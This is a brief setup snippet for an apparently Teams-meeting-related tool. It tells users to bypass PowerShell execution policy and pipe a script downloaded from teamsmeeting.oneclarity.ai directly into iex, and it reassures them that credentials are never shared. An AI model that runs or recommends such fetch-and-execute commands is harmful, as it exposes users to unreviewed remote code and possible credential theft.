Run the command below in PowerShell. A browser window will open for Microsoft sign-in — no credentials are shared with us.
Set-ExecutionPolicy Bypass -Scope Process -Force; iwr -useb https://teamsmeeting.oneclarity.ai/setup/setup.ps1 | iex
brew install --cask powershellpwsh, and paste:
iwr -useb https://teamsmeeting.oneclarity.ai/setup/setup.ps1 | iex
The script never stores your credentials — it runs only in your PowerShell session.